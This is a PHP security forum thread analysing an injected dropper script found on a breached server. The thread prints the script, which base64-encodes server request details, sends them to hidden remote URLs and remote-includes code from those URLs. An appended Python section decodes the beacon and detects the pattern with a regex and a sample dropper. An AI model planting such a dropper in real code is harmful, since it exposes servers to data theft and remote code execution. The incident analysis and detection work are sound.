A Q about someone's code injection..

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Jenk
DevNet Master
Posts: 3587
Joined: Mon Sep 19, 2005 6:24 am
Location: London

Post by Jenk »

Recently a server that I did some work on was breached and two PHP files added to a directory.

The contents of these files were different but both completed the same task - they gathered various $_SERVER info and then included from a Russian URL with the info in the GET vars.

Anyway - the one thing that struck me was the script kiddie's use of base64_encode() to 'mask' the URL?!

The last bit puzzled me somewhat.. was this a weak attempt at obfuscation, or is there some other reason (perhaps fooling include/require/PHP into thinking it is not actually including over HTTP - not likely, I would have thought)?
Buddha443556
Forum Regular
Posts: 873
Joined: Fri Mar 19, 2004 1:51 pm

Post by Buddha443556 »

Maybe the URL has become the signature for the exploit and the base64 encoding is just an attempt to hide that signature? That's reaching pretty far though. Probably just trying to hide the URL from your average Fantastico user who has zero programming experience.
Maugrim_The_Reaper
DevNet Master
Posts: 2704
Joined: Tue Nov 02, 2004 5:43 am
Location: Ireland

Post by Maugrim_The_Reaper »

What does base64_decode() say? It's likely just an obscuration measure - base64 isn't all that hard to decode. It also makes it easier to pass some data without being affected by URL encodings.
Jenk
DevNet Master
Posts: 3587
Joined: Mon Sep 19, 2005 6:24 am
Location: London

Post by Jenk »

It's the URL to a ruski site along with the info collected from $_SERVER. This is what was injected into one of the files; nothing malicious here, but obviously we don't know what is in the includes:

Code:

<?
error_reporting(0);
$s = "e";
// Each value falls back to the old register_globals name when $_SERVER is not set
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
// Eight base64 fields joined with "." and terminated by ".e", sent as the query string
$str = base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "."
     . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "."
     . base64_encode($g) . "." . base64_encode($h) . ".$s";
// Remote include from the first URL; if that fails, fall back to a second URL
if ((include(base64_decode(/* removed */) . base64_decode(/* removed */) . "/?" . $str))) {
} else {
    include(base64_decode(/* removed */) . base64_decode(/* removed */) . "/?" . $str);
}
?>
Where /* removed */ was the URL broken into two and base64-encoded. (The if challenge has two different URLs.)
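As an added example for the incident-response side of this thread (not code from the forum or from the dropper), the following Python decodes the `?<b64>.<b64>...e` beacon string that the injected script appends to the remote include, so the exfiltrated $_SERVER fields can be reconstructed from a proxy or access log, and checks a PHP source file for the `include(base64_decode(` signature Buddha443556 mentions. The sample server values and PHP snippets are constructed for the test.

```python
import base64
import re
from urllib.parse import unquote

# Field order is fixed by the dropper: $a..$h, followed by the literal "$s" (= "e").
FIELDS = ("HTTP_HOST", "SERVER_NAME", "REQUEST_URI", "PHP_SELF",
          "QUERY_STRING", "HTTP_REFERER", "HTTP_USER_AGENT", "REMOTE_ADDR")

def decode_beacon(query: str) -> dict:
    """Recover the eight $_SERVER values from the dropper's query string.

    The base64 alphabet never contains '.', so splitting on '.' gives the fields
    exactly; an unset field (e.g. no Referer) encodes as '' and decodes back to ''.
    """
    query = unquote(query.lstrip("?"))          # logs often percent-encode '/', '+' and '='
    parts = query.split(".")
    if len(parts) != len(FIELDS) + 1 or parts[-1] != "e":
        raise ValueError("not a beacon string in this dropper's format")
    return {name: base64.b64decode(part, validate=True).decode("utf-8", "replace")
            for name, part in zip(FIELDS, parts[:-1])}

# File signature: an include/require whose target is assembled from base64_decode(),
# together with the error_reporting(0) the dropper uses to stay quiet.
DROPPER_RE = re.compile(r"\b(include|require)(_once)?\s*\(\s*base64_decode\s*\(")

def looks_like_dropper(php_source: str) -> bool:
    return bool(DROPPER_RE.search(php_source)) and "error_reporting(0)" in php_source

def encode_beacon(server: dict) -> str:
    """Constructed helper that mirrors the PHP $str assembly, used to build test input."""
    return "?" + ".".join(base64.b64encode(server.get(f, "").encode()).decode()
                          for f in FIELDS) + ".e"

# Constructed sample request and PHP snippets (placeholder values, not from the incident).
SAMPLE_SERVER = {"HTTP_HOST": "www.example.com", "SERVER_NAME": "www.example.com",
                 "REQUEST_URI": "/index.php?id=1", "PHP_SELF": "/index.php",
                 "QUERY_STRING": "id=1", "HTTP_REFERER": "",
                 "HTTP_USER_AGENT": "Mozilla/5.0", "REMOTE_ADDR": "192.0.2.10"}
SAMPLE_DROPPER = '<? error_reporting(0); if ((include(base64_decode("aHR0cDovL2V4YW1wbGUuY29t")."/?".$str))){} ?>'
SAMPLE_BENIGN = '<?php error_reporting(E_ALL); include("config.php"); ?>'

if __name__ == "__main__":
    print(decode_beacon(encode_beacon(SAMPLE_SERVER)))
    print(looks_like_dropper(SAMPLE_DROPPER), looks_like_dropper(SAMPLE_BENIGN))
```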